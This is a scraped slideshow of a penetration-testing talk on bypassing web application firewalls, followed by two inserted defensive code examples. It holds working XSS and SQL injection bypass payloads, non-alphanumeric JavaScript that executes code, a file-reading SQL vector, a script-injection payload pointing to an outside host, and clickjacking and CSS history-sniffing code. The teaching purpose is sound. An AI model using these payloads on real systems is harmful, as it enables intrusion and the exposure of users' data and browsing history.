TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving

Bypassing Web Application Firewalls

  • 1. Bypassing Web Application Firewalls (WAFs)
    Ing. Pavol Lupták, CISSP, CEH
    Lead Security Consultant
    www.nethemba.com
  • 2. Nethemba – All About Security
    - Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)
    - Core business: All kinds of penetration tests, comprehensive web application security audits, local system and wifi security audits, security consulting, forensic analysis, secure VoIP, ultra-secure systems
    - OWASP activists: Leaders of the Slovak/Czech OWASP chapters, co-authors of the most recognized OWASP Testing Guide v3.0, working on the new version
    - We are the only ones in Slovakia/Czech Republic that offer:
      - Penetration tests and security audits of SAP
      - Security audits of smart RFID cards
      - Unique own and sponsored security research in many areas (see our references – Vulnerabilities in public transport SMS tickets, cracked the most used Mifare Classic RFID cards)
  • 3. What are WAFs?
    - Emerged from IDS/IPS focused on the HTTP protocol and HTTP-related attacks
    - Usually contain a lot of complex reg-exp rules to match
    - Support special features like cookie encryption, CSRF protection, etc.
    - Except for the free mod_security they are quite expensive (and often there is no correlation between the price and their filtering capabilities)
  • 4. WAFs implementations
    - Usually they are deployed in “blacklisting mode”, which is more vulnerable to bypasses and targeted attacks
    - The application “context” (the type of allowed inputs) must be known in order to deploy the more secure “whitelisting mode”
    - All WAFs can be bypassed
    - A WAF is just a workaround, but from the security point of view it can be cost-effective
  • 5. WAF filter rules
    - Directly reflect WAF effectiveness
    - For most WAF vendors they are closely guarded secrets – the most determined attackers are able to bypass them without seeing the actual rules
    - Open-source WAFs (mod_security, PHPIDS) have open-source rules, which allows more scrutiny by skilled penetration testers
  • 6. Typical WAF bypasses
    Blocked attack                            Undetected modification
    'or 1=1--                                 ' or 2=2--
    alert(0)                                  %00alert(0)
    <script>alert(0)</script>                 <script type=vbscript>MsgBox(0)</script>
    ' or ''''='r                              '/**/OR/**/''''='
    <script>alert(0)</script>                 <img src="x:x" onerror="alert(0)"></img>
    <img src=x:x onerror=alert(0)//></img>    <img src=http://url onload=alert(0)//></img>
    1 or 1=1                                  (1)or(1)=(1)
    eval(name)                                x=this.name
                                              X(0?$:name+1)
  • 7. Yes, WAFs may also be vulnerable!
    - A WAF also increases the attack surface of the target organization
    - A WAF may be the target of, and vulnerable to, malicious attacks, e.g. XSS, SQL injection, denial-of-service attacks, remote code execution vulnerabilities
    - These vulnerabilities have been found in all types of WAF products(!)
  • 8. Typical bypass flow
    1. Find out which characters / sequences are allowed by the WAF
    2. Make an obfuscated version of your injected payload
    3. Test it and watch the WAF/application response
    4. If it does not work, modify it and go back to step 2
  • 9. Javascript obfuscation
    - Javascript has very powerful features
    - A Javascript payload is used in XSS attacks
    - It is full of evals, expression closures, generator expressions, iterators, special characters and shortcuts
    - Supports a lot of encodings (unicode – multibyte characters, hexadecimal, octal, and combinations of all of them)
    - Supports XOR, “Encryption”, Base64
  • 10. Non-alphanumeric javascript code
    - Even if only a few characters are allowed it is possible to construct fully functional code:

      _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;   // _=1 $=0 __=2 ___=3 ____=4 _____=5
      $$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];   // "constructor"
      $$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];   // "alert"
      $_$=({}+"")[+_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___];   // "cool code"
      ($)[$$][$$]($$$+"('"+$_$+"')")()   // (0)["constructor"]["constructor"]("alert('cool code')")()

      ([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](-~Á)   // letters picked from "false[object Object]" and "truea", calls alert(1)
  • 11. Let's bypass WAF!
    - Example situation: the WAF blocks alpha characters and numbers (probably not a very real situation, just a proof-of-concept :-)
    - Allows only a few special characters: (){}_=[];$"!+<>
    - Let's generate fully non-alphanumeric javascript code!
  • 13. Source of different alphanumeric characters in Javascript
    Javascript object / String   Result / error state
    {}+''                        “[object Object]”
    +[][+[]]                     “NaN”
    [][+[]]+[]                   “undefined”
    [![]]+[]                     “false”
    [!![]]+[]                    “true”
  • 14. Shortest Possible Ways to Create Zero without Using Numbers
    Characters   Result
    +[]          0
    +''          0
    +""          0
    -[]          0
    -''          0
    -""          0
  • 15. Generating numbers
      +[]                              //0
      ++[[]][+[]]                      //1
      +!+[]                            //1
      ++[++[[]][+[]]][+[]]             //2
      !+[]+!+[]                        //2
      ++[++[++[[]][+[]]][+[]]][+[]]    //3
      !+[]+!+[]+!+[]                   //3
  • 16. Gain alpha characters without directly using them
    - When you define a Javascript object using the object literal and concatenate it with a string, the result is [object Object]
      _={}+''; //[object Object]
      alert(_[1]) //returns the 'o' character
  • 17. Generate string “alert” without using any alphanumeric characters
    - Let's start with 'a'
    - What Javascript object contains 'a'?
    - We can use 'NaN' (Not a Number)
    - Access the empty array with index “0” (undefined) and convert it to a number (NaN)
      +[][+[]] // result: NaN
  • 18. Generating 'a' character
    - 'NaN'[1]='a'
      ++[[]][+[]] //1
      +[][+[]]+[] // result string: NaN
      (+[][+[]]+[])[++[[]][+[]]] //a
    - We have character 'a'
  • 19. Generating 'l' character
    - Use boolean false
    - We can use the ! (NOT) operator, e.g. ''==0 //true
    - Use a blank array (string) and then the NOT operator to obtain a boolean, wrap it with [] and convert it to a string
      ([![]]+[]) //string “false”
  • 20. Generating 'l' character
      ++[++[[]][+[]]][+[]] //2
      ([![]]+[]) //string “false”
      'false'[2] = ([![]]+[])[++[++[[]][+[]]][+[]]] // 'l'
    - We have the 'l' character!
  • 21. Generating 'e' character
    - It's easy, we can use boolean true
      ([!![]]+[]) // string 'true'
      ++[++[++[[]][+[]]][+[]]][+[]] //3
      'true'[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] //e
    - And we have the 'e' character!
  • 22. Generating 'r' character
    - It's easy, we can use boolean true
      ([!![]]+[]) // string 'true'
      ++[[]][+[]] //1
      'true'[1] = ([!![]]+[])[++[[]][+[]]] //r
    - And we have the 'r' character!
  • 23. Generating 't' character
    - It's easy, we can use boolean true
      ([!![]]+[]) // string 'true'
      +[] //0
      'true'[0] = ([!![]]+[])[+[]] //t
    - And we have the 't' character!
  • 24. And now we have the 'alert' string!
      (+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] //string 'alert'
  • 25. How to execute the code of our choice?
    - It is necessary to obtain the window object to access all properties of window
    - If you can access a constructor, you can access the Function constructor to execute arbitrary code
    - The shortest possible way to get window is:
      alert((1,[].sort)()) // shows the window object!
    - Works in all browsers except IE
  • 26. How to generate the 'sort' string
    - We know how to generate the string 'alert'
    - We need to generate the 'sort' string
      'false'[3] = ([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] //'s'
    - We can gain 'o' from []+{} ([object Object])
      ([]+{})[++[[]][+[]]] //o
    - We have already generated 'r' and 't'
  • 28. Let's build it together – call alert(1)
      (1,[].sort)().alert(1)
    - After changing the number 1 and all alpha characters to their obfuscated version we get:
      ([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]]) //calls alert(1)!
  • 29. How to call any arbitrary Javascript function
    - Using the array constructor (accessing the constructor twice from an array object returns Function):
      [].constructor.constructor("alert(1)")()
    - We need to generate the remaining letters 'c','n','u'; gain them from the output of the [].sort function:
      function sort() { [native code] }
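Added example, not part of the original slides: a detection heuristic for the non-alphanumeric JavaScript built on slides 13-29, run over three constructed access-log lines. A signature such as /alert\(/ never fires on such a value because the identifier is assembled at run time, so the shape of the value is scored instead; the block patterns, thresholds, the decoding and the evaluateExpression helper are my own choices, not the author's.

```javascript
// Added example, not from the slides: score query-string values for the
// coercion building blocks the slides rely on: +[] (0), ![] and !![]
// (false/true), [[]][+[]] (indexing), ++[ (counting up), {}+ ("[object Object]").
const BLOCKS = /\+\[\]|!\[\]|\]\]\[|\[\[\]\]|\+\+\[|\]\+\[|\{\}\+|\+\{\}/g;

// Query-string decoding: form-encoded '+' is a space, then percent-decode.
function decodeParam(raw) {
  try { return decodeURIComponent(raw.replace(/\+/g, ' ')); } catch (e) { return raw; }
}

// Scores one parameter value: many coercion blocks and (almost) no letters or
// digits is the shape the slides produce and that ordinary input never has.
// Thresholds are illustrative; tune them against your own traffic.
function analyzeValue(value) {
  const s = decodeParam(value);
  const blocks = (s.match(BLOCKS) || []).length;
  const alnum = (s.match(/[A-Za-z0-9]/g) || []).length;
  const alnumRatio = s.length ? alnum / s.length : 1;
  return { blocks, alnumRatio, suspicious: blocks >= 6 && alnumRatio < 0.05 };
}

// Returns the suspicious query parameters of one access-log request line.
function scanLogLine(line) {
  const m = line.match(/^\S+ \S*?\?(\S*) /);
  if (!m) return [];
  return m[1].split('&').map((kv) => {
    const [name, value = ''] = kv.split('=');
    return { name, ...analyzeValue(value) };
  }).filter((r) => r.suspicious);
}

// Confirms the slides' claim: the slide-24 expression evaluates to the
// string 'alert' although it contains no letter or digit at all.
function evaluateExpression(expr) {
  return Function('"use strict"; return (' + expr + ');')();
}

// Constructed sample log lines (not real traffic); the third one carries the
// slide-24 expression percent-encoded the way a browser would send it.
const SLIDE24 = '(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]'
  + '+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]'
  + '+([!![]]+[])[+[]]';
const LOG = [
  'GET /search?q=hello+world HTTP/1.1',
  'GET /api?ids=%5B%5B1%2C2%5D%2C%5B3%2C4%5D%5D HTTP/1.1',
  'GET /search?q=' + encodeURIComponent(SLIDE24) + ' HTTP/1.1',
];
```

The second line, a JSON array of numbers, shows that ordinary bracket-heavy input stays below the threshold because it still contains digits and none of the coercion blocks.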
  • 30. SQL obfuscation
    - What is obfuscation of an SQL injection vector?
    - Different DBMSs have different SQL syntax; most of them support Unicode, Base64, hex, octal and binary representations, escaping, and hashing algorithms (MD5, SHA-1)
    - Many “blacklisted” characters can be replaced by their functional alternatives (0xA0 in MySQL)
    - Obfuscated comments – it is difficult to determine what is a comment and what is not
  • 31. SQL obfuscation examples
      SELECT CONCAT(char(x'70617373',b'1110111011011110111001001100100'))
      s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
      SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
      SELECT(extractvalue(0x3C613E61646D696E3C2F613, 0x2F61))
  • 32. New SQL features
    - MySQL/PostgreSQL support XML functions:
      SELECT UpdateXML('<script x=_></script>', '/script/@x','src=//0x.lv');
    - HTML5 supports local DB storage (SQLite 3.1+) (openDatabase object) – it can be misused for persistent XSS and local SQL injection attacks
  • 33. Existing obfuscation tools
    - Hackvertor http://hackvertor.co.uk/public
    - HackBar https://addons.mozilla.org/en-US/firefox/addon/hack
    - Malzilla http://malzilla.sourceforge.net/
    - Your imagination :)
  • 34. Summary
    - WAFs are just workarounds!
    - The best solution is to care about security in every SDLC phase and strictly validate all inputs and outputs in the application
    - Use whitelisting instead of blacklisting (both in the application and in the WAF!)
    - Use multilayer security – a 3-layer database architecture or database firewalls
    - For SQL use “prepared” statements
    - For HTML use HTML Purifier or the OWASP AntiSamy project
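Added example, not part of the original slides, illustrating the summary's whitelisting advice with the pairs from slide 6: three naive blacklist rules of the kind a signature-based WAF ships each catch the "blocked attack" and miss its "undetected modification", while a context-specific whitelist rejects both. The rules, the username whitelist and the benign samples are my own constructions.

```javascript
// Added example, not from the slides: blacklist rules versus a whitelist,
// evaluated on the attack/variant pairs of slide 6.

// Naive signature rules, one per attack family shown on slide 6 (constructed).
const BLACKLIST = [
  /\bor\s+1\s*=\s*1/i,   // matches 'or 1=1--
  /<script\b/i,          // matches <script>alert(0)</script>
  /\beval\s*\(/i,        // matches eval(name)
];

function blacklistBlocks(input) {
  return BLACKLIST.some((rule) => rule.test(input));
}

// Whitelist for a field whose application "context" (slide 4) is a
// username-like token: only the allowed alphabet, bounded length.
const USERNAME = /^[A-Za-z0-9_]{1,32}$/;

function whitelistAccepts(input) {
  return USERNAME.test(input);
}

// Pairs taken from slide 6: [blocked attack, undetected modification].
const PAIRS = [
  ["'or 1=1--", "' or 2=2--"],
  ['<script>alert(0)</script>', '<img src=x:x onerror=alert(0)//></img>'],
  ['1 or 1=1', '(1)or(1)=(1)'],
  ['eval(name)', 'x=this.name'],
];

// For each pair, what the two approaches do with the attack and its variant.
function compare(pairs = PAIRS) {
  return pairs.map(([attack, variant]) => ({
    attack,
    variant,
    blacklist: { blocksAttack: blacklistBlocks(attack), blocksVariant: blacklistBlocks(variant) },
    whitelist: { rejectsAttack: !whitelistAccepts(attack), rejectsVariant: !whitelistAccepts(variant) },
  }));
}

// The whitelist must still let legitimate values through (constructed samples).
function whitelistKeepsBenign(samples = ['alice', 'bob_42']) {
  return samples.every(whitelistAccepts);
}
```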
  • 35. References
    - Web Application Obfuscation http://www.amazon.com/Web-Application-Obfuscati
    - XSS Attacks: Cross Site Scripting Exploits and Defense http://www.amazon.com/XSS-Attacks-Scripting-Exp
    - Special thanks to Mario Heiderich and Stefano Di Paola
  • 36. UI redressing attacks – clickjacking
      <style>
        iframe { filter: alpha(opacity=0); opacity: 0; position: absolute; top: 0px; left: 0px; height: 300px; width: 250px; }
        img { position: absolute; top: 0px; left: 0px; height: 300px; width: 250px; }
      </style>
      <img src="WHAT THE USER SEES"/>
      <iframe src="WHAT THE USER IS ACTUALLY INTERACTING WITH"></iframe>
  • 37. Clickjacking protection
    - Blocks using X-Frame-Options: NEVER
      <body>
      <script>
        if (top!=self) document.write('<plaintext>');
      </script>
      ...
  • 38. CSS History attack
      <style>
        a { position: relative; }
        a:visited { position: absolute; }
      </style>
      <a id="v" href="http://www.google.com/">Google</a>
      <script>
        var l=document.getElementById("v");
        var c=getComputedStyle(l).position;
        c=="absolute"?alert("visited"):alert("not visited");
      </script>
  • 39. CSS History exploitation methods
    - Social network deanonymization attacks
    - Session ID/CSRF token local brute-force attack
    - LAN scanners
    - Fixed in Firefox 4.0, current browsers are vulnerable